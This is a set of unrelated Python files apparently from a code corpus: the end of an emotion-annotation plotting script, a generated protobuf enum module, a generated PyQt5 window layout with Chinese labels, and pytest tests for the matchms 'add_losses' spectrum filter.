opj(statspath, 'timeseries',
'ioats_%s_%s_%s.csv' % (seglabel, ratlabel, char.lower())),
arr, fmt='%.2f', delimiter=',', comments='',
header=','.join(l))
# export summary stats for the data paper
print_stats(avr, 'AV', avr + aor)
print_stats(aor, 'AO', avr + aor)
print_combstats(avr, aor)
# IOA time series demo plot
mkplot_indicator_ts(avr, aor, '*', get_nsecond_segments(n=10), figpath)
# episodes per character plot
fig = pl.figure(figsize=(10, 6))
pl.subplot(121)
comp_barplot(
get_agreed_labels(avr, 'character', second_segments, athresh=.5, nseg_thresh=5),
get_agreed_labels(aor, 'character', second_segments, athresh=.5, nseg_thresh=5),
2,
'Total number of emotion episodes')
ax = pl.subplot(122)
comp_barplot(
get_agreed_labels(avr, 'character', second_segments, athresh=.5, nseg_thresh=5),
get_agreed_labels(aor, 'character', second_segments, athresh=.5, nseg_thresh=5),
1,
'Total time of portrayed emotions (in sec)')
ax.yaxis.tick_right()
ax.yaxis.set_label_position("right")
fig.autofmt_xdate()
pl.savefig(opj(figpath, 'character_episodes.svg'))
    # episodes per emotion category plot
fig = pl.figure(figsize=(10, 6))
pl.subplot(121)
comp_barplot(
get_agreed_labels(avr, 'emotion', second_segments, athresh=.5, nseg_thresh=5),
get_agreed_labels(aor, 'emotion', second_segments, athresh=.5, nseg_thresh=5),
2,
'Total number of emotion episodes')
ax = pl.subplot(122)
comp_barplot(
get_agreed_labels(avr, 'emotion', second_segments, athresh=.5, nseg_thresh=5),
get_agreed_labels(aor, 'emotion', second_segments, athresh=.5, nseg_thresh=5),
1,
        'Total time of portrayed emotions (in sec)')
ax.yaxis.tick_right()
ax.yaxis.set_label_position("right")
fig.autofmt_xdate()
pl.savefig(opj(figpath, 'labeledemotion_episodes.svg'))
# episodes per onset cue type plot
fig = pl.figure(figsize=(5, 5))
comp_barplot(
get_agreed_labels(avr, 'oncue', second_segments, athresh=.5, nseg_thresh=5),
get_agreed_labels(aor, 'oncue', second_segments, athresh=.5, nseg_thresh=5),
2,
'Total number of emotion episodes')
fig.autofmt_xdate()
pl.savefig(opj(figpath, 'labeledoncue_episodes.svg'))
# intra-stimulus IOA time series correlation plot
import seaborn as sns
fig = pl.figure()
cmap_range = (-.6, .6)
pl.subplot(121)
m, l = get_timeseries(avr, avr + aor, second_segments)
l = [bn(i) for i in l]
sns.corrplot(
m, annot=False, method='spearman', names=l, diag_names=False, cmap_range=cmap_range)
pl.subplot(122)
m, l = get_timeseries(aor, avr + aor, second_segments)
l = [bn(i) for i in l]
sns.corrplot(
m, annot=False, method='spearman', names=l, diag_names=False, cmap_range=cmap_range)
# fig.autofmt_xdate()
pl.savefig(opj(figpath, 'intercorr_indicators.svg'))
# pl.show()
| StarcoderdataPython |
1788666 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: control_delegation.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='control_delegation.proto',
package='protocol',
syntax='proto2',
serialized_pb=_b('\n\x18\x63ontrol_delegation.proto\x12\x08protocol*<\n\x1bprp_control_delegation_type\x12\x1d\n\x19PRCDT_MAC_DL_UE_SCHEDULER\x10\x01')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_PRP_CONTROL_DELEGATION_TYPE = _descriptor.EnumDescriptor(
name='prp_control_delegation_type',
full_name='protocol.prp_control_delegation_type',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='PRCDT_MAC_DL_UE_SCHEDULER', index=0, number=1,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=38,
serialized_end=98,
)
_sym_db.RegisterEnumDescriptor(_PRP_CONTROL_DELEGATION_TYPE)
prp_control_delegation_type = enum_type_wrapper.EnumTypeWrapper(_PRP_CONTROL_DELEGATION_TYPE)
PRCDT_MAC_DL_UE_SCHEDULER = 1
DESCRIPTOR.enum_types_by_name['prp_control_delegation_type'] = _PRP_CONTROL_DELEGATION_TYPE
# @@protoc_insertion_point(module_scope)
| StarcoderdataPython |
1632418 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ComplexUI.ui'
#
# Created by: PyQt5 UI code generator 5.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(801, 600)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setGeometry(QtCore.QRect(0, 0, 801, 551))
self.tabWidget.setObjectName("tabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.tabWidget_2 = QtWidgets.QTabWidget(self.tab)
self.tabWidget_2.setGeometry(QtCore.QRect(0, 0, 791, 531))
self.tabWidget_2.setObjectName("tabWidget_2")
self.tab_3 = QtWidgets.QWidget()
self.tab_3.setObjectName("tab_3")
self.treeWidget = QtWidgets.QTreeWidget(self.tab_3)
self.treeWidget.setGeometry(QtCore.QRect(0, 0, 781, 501))
self.treeWidget.setObjectName("treeWidget")
item_0 = QtWidgets.QTreeWidgetItem(self.treeWidget)
item_0 = QtWidgets.QTreeWidgetItem(self.treeWidget)
item_1 = QtWidgets.QTreeWidgetItem(item_0)
self.tabWidget_2.addTab(self.tab_3, "")
self.tab_4 = QtWidgets.QWidget()
self.tab_4.setObjectName("tab_4")
self.verticalLayoutWidget = QtWidgets.QWidget(self.tab_4)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 791, 501))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.calendarWidget = QtWidgets.QCalendarWidget(self.verticalLayoutWidget)
self.calendarWidget.setObjectName("calendarWidget")
self.verticalLayout.addWidget(self.calendarWidget)
self.dateEdit = QtWidgets.QDateEdit(self.verticalLayoutWidget)
self.dateEdit.setObjectName("dateEdit")
self.verticalLayout.addWidget(self.dateEdit)
self.tabWidget_2.addTab(self.tab_4, "")
self.tabWidget.addTab(self.tab, "")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.groupBox = QtWidgets.QGroupBox(self.tab_2)
self.groupBox.setGeometry(QtCore.QRect(10, 20, 331, 131))
self.groupBox.setObjectName("groupBox")
self.widget = QtWidgets.QWidget(self.groupBox)
self.widget.setGeometry(QtCore.QRect(90, 30, 55, 62))
self.widget.setObjectName("widget")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.widget)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.radioButton = QtWidgets.QRadioButton(self.widget)
self.radioButton.setObjectName("radioButton")
self.verticalLayout_2.addWidget(self.radioButton)
self.radioButton_2 = QtWidgets.QRadioButton(self.widget)
self.radioButton_2.setObjectName("radioButton_2")
self.verticalLayout_2.addWidget(self.radioButton_2)
self.radioButton_3 = QtWidgets.QRadioButton(self.widget)
self.radioButton_3.setObjectName("radioButton_3")
self.verticalLayout_2.addWidget(self.radioButton_3)
self.groupBox_2 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_2.setGeometry(QtCore.QRect(350, 20, 431, 131))
self.groupBox_2.setObjectName("groupBox_2")
self.widget1 = QtWidgets.QWidget(self.groupBox_2)
self.widget1.setGeometry(QtCore.QRect(80, 20, 311, 102))
self.widget1.setObjectName("widget1")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget1)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.dial = QtWidgets.QDial(self.widget1)
self.dial.setObjectName("dial")
self.horizontalLayout.addWidget(self.dial)
self.lcdNumber = QtWidgets.QLCDNumber(self.widget1)
self.lcdNumber.setObjectName("lcdNumber")
self.horizontalLayout.addWidget(self.lcdNumber)
self.fontComboBox = QtWidgets.QFontComboBox(self.tab_2)
self.fontComboBox.setGeometry(QtCore.QRect(10, 190, 331, 22))
self.fontComboBox.setObjectName("fontComboBox")
self.label = QtWidgets.QLabel(self.tab_2)
self.label.setGeometry(QtCore.QRect(10, 220, 331, 211))
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.progressBar = QtWidgets.QProgressBar(self.tab_2)
self.progressBar.setGeometry(QtCore.QRect(10, 470, 781, 23))
self.progressBar.setProperty("value", 24)
self.progressBar.setObjectName("progressBar")
self.tabWidget.addTab(self.tab_2, "")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 801, 23))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
self.tabWidget_2.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "ComplexUI"))
self.treeWidget.headerItem().setText(0, _translate("MainWindow", "第1列"))
self.treeWidget.headerItem().setText(1, _translate("MainWindow", "New Column"))
__sortingEnabled = self.treeWidget.isSortingEnabled()
self.treeWidget.setSortingEnabled(False)
self.treeWidget.topLevelItem(0).setText(0, _translate("MainWindow", "子项目1"))
self.treeWidget.topLevelItem(1).setText(0, _translate("MainWindow", "子项目2"))
self.treeWidget.topLevelItem(1).child(0).setText(0, _translate("MainWindow", "子子项目1"))
self.treeWidget.setSortingEnabled(__sortingEnabled)
self.tabWidget_2.setTabText(self.tabWidget_2.indexOf(self.tab_3), _translate("MainWindow", "树"))
self.tabWidget_2.setTabText(self.tabWidget_2.indexOf(self.tab_4), _translate("MainWindow", "日历"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "选项卡1"))
self.groupBox.setTitle(_translate("MainWindow", "功能选择"))
self.radioButton.setText(_translate("MainWindow", "默认"))
self.radioButton_2.setText(_translate("MainWindow", "重置"))
self.radioButton_3.setText(_translate("MainWindow", "选项3"))
self.groupBox_2.setTitle(_translate("MainWindow", "移动刻度盘"))
self.label.setText(_translate("MainWindow", "TextLabel"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "选项卡2"))
| StarcoderdataPython |
174454 | import numpy
import pytest
from testfixtures import LogCapture
from matchms.filtering import add_losses
from .builder_Spectrum import SpectrumBuilder
@pytest.mark.parametrize("mz, loss_mz_to, expected_mz, expected_intensities", [
[numpy.array([100, 150, 200, 300], dtype="float"), 1000, numpy.array([145, 245, 295, 345], "float"), numpy.array([1000, 100, 200, 700], "float")],
[numpy.array([100, 150, 200, 450], dtype="float"), 1000, numpy.array([245, 295, 345], "float"), numpy.array([100, 200, 700], "float")],
[numpy.array([100, 150, 200, 300], dtype="float"), 250, numpy.array([145, 245], "float"), numpy.array([1000, 100], "float")]
])
def test_add_losses_parameterized(mz, loss_mz_to, expected_mz, expected_intensities):
intensities = numpy.array([700, 200, 100, 1000], "float")
metadata = {"precursor_mz": 445.0}
spectrum_in = SpectrumBuilder().with_mz(mz).with_intensities(
intensities).with_metadata(metadata).build()
spectrum = add_losses(spectrum_in, loss_mz_to=loss_mz_to)
assert numpy.allclose(spectrum.losses.mz, expected_mz), "Expected different loss m/z."
assert numpy.allclose(spectrum.losses.intensities, expected_intensities), "Expected different intensities."
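# Note on the expected values above (added comment): the parametrization is
# consistent with losses computed as precursor_mz - peak m/z, e.g.
# 445 - 300 = 145 up to 445 - 100 = 345, sorted ascending together with the
# matching peak intensities; a peak above the precursor (m/z 450) drops out,
# and loss_mz_to=250 keeps only the losses 145 and 245.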
@pytest.mark.parametrize("mz, intensities", [
[numpy.array([100, 150, 200, 300], dtype="float"), numpy.array([700, 200, 100, 1000], dtype="float")],
[[], []]
])
def test_add_losses_without_precursor_mz_parameterized(mz, intensities):
spectrum_in = SpectrumBuilder().with_mz(mz).with_intensities(intensities).build()
with LogCapture() as log:
spectrum = add_losses(spectrum_in)
assert spectrum == spectrum_in and spectrum is not spectrum_in
log.check(
("matchms", "WARNING",
"No precursor_mz found. Consider applying 'add_precursor_mz' filter first.")
)
def test_add_losses_with_precursor_mz_wrong_type():
"""Test if correct assert error is raised for precursor-mz as string."""
mz = numpy.array([100, 150, 200, 300], dtype="float")
intensities = numpy.array([700, 200, 100, 1000], "float")
metadata = {"precursor_mz": "445.0"}
spectrum_in = SpectrumBuilder().with_mz(mz).with_intensities(
intensities).with_metadata(metadata).build()
with pytest.raises(AssertionError) as msg:
_ = add_losses(spectrum_in)
assert "Expected 'precursor_mz' to be a scalar number." in str(msg.value)
def test_add_losses_with_input_none():
"""Test if input spectrum is None."""
spectrum_in = None
spectrum = add_losses(spectrum_in)
assert spectrum is None
| StarcoderdataPython |